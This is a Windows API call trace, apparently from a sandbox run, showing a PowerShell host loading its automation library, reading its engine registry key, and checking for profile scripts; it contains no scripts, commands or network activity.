	[0104.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.625] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0104.631] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.631] CoTaskMemFree (pv=0x28e290) 
	[0104.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0104.641] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.641] CoTaskMemFree (pv=0x28e290) 
	[0104.642] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.642] CoTaskMemFree (pv=0x28e290) 
	[0104.642] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.642] CoTaskMemFree (pv=0x28e290) 
	[0104.644] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.644] CoTaskMemFree (pv=0x28e290) 
	[0104.649] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.649] CoTaskMemFree (pv=0x28e290) 
	[0104.649] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.650] CoTaskMemFree (pv=0x28e290) 
	[0104.654] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0104.654] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0104.835] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0104.840] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.840] CoTaskMemFree (pv=0x28e290) 
	[0105.063] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x28e3a0
	[0105.065] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x28e4b0
	[0105.423] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.608] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.610] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.610] VirtualQuery (in: lpAddress=0xea420, lpBuffer=0xeb2e0, dwLength=0x30 | out: lpBuffer=0xeb2e0*(BaseAddress=0xea000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.632] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.632] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.632] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.632] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.633] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.634] VirtualQuery (in: lpAddress=0xeb9d0, lpBuffer=0xec890, dwLength=0x30 | out: lpBuffer=0xec890*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.636] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.636] CoTaskMemFree (pv=0x28e5c0) 
	[0105.638] CoTaskMemAlloc (cb=0x104) returned 0x28e5c0
	[0105.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e5c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0105.638] CoTaskMemFree (pv=0x28e5c0) 
	[0105.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.727] VirtualQuery (in: lpAddress=0xebc80, lpBuffer=0xecb40, dwLength=0x30 | out: lpBuffer=0xecb40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0105.732] VirtualQuery (in: lpAddress=0xebc80, lpBuffer=0xecb40, dwLength=0x30 | out: lpBuffer=0xecb40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.733] VirtualQuery (in: lpAddress=0xeb4d0, lpBuffer=0xec390, dwLength=0x30 | out: lpBuffer=0xec390*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.733] VirtualQuery (in: lpAddress=0xeb4d0, lpBuffer=0xec390, dwLength=0x30 | out: lpBuffer=0xec390*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0105.733] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedad8 | out: phkResult=0xedad8*=0x390) returned 0x0
	[0105.734] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xeda5c, lpData=0x0, lpcbData=0xeda58*=0x0 | out: lpType=0xeda5c*=0x1, lpData=0x0, lpcbData=0xeda58*=0x56) returned 0x0
	[0105.734] CoTaskMemAlloc (cb=0x5a) returned 0x27d090
	[0105.734] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xeda2c, lpData=0x27d090, lpcbData=0xeda28*=0x56 | out: lpType=0xeda2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xeda28*=0x56) returned 0x0
	[0105.734] CoTaskMemFree (pv=0x27d090) 
	[0105.734] RegCloseKey (hKey=0x390) returned 0x0
	[0105.734] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedad8 | out: phkResult=0xedad8*=0x390) returned 0x0
	[0105.734] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xeda5c, lpData=0x0, lpcbData=0xeda58*=0x0 | out: lpType=0xeda5c*=0x1, lpData=0x0, lpcbData=0xeda58*=0x56) returned 0x0
	[0105.734] CoTaskMemAlloc (cb=0x5a) returned 0x27d090
	[0105.734] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xeda2c, lpData=0x27d090, lpcbData=0xeda28*=0x56 | out: lpType=0xeda2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xeda28*=0x56) returned 0x0
	[0105.734] CoTaskMemFree (pv=0x27d090) 
	[0105.734] RegCloseKey (hKey=0x390) returned 0x0
	[0105.735] CoTaskMemAlloc (cb=0x20c) returned 0x1b310970
	[0105.735] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b310970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0105.735] CoTaskMemFree (pv=0x1b310970) 
	[0105.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0105.735] CoTaskMemAlloc (cb=0x20c) returned 0x1b310970
	[0105.735] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b310970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0105.735] CoTaskMemFree (pv=0x1b310970) 
	[0105.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0105.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0105.736] SetErrorMode (uMode=0x1) returned 0x1
	[0105.736] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xeda40 | out: lpFileInformation=0xeda40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0105.737] SetErrorMode (uMode=0x1) returned 0x1
	[0105.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0105.809] SetErrorMode (uMode=0x1) returned 0x1
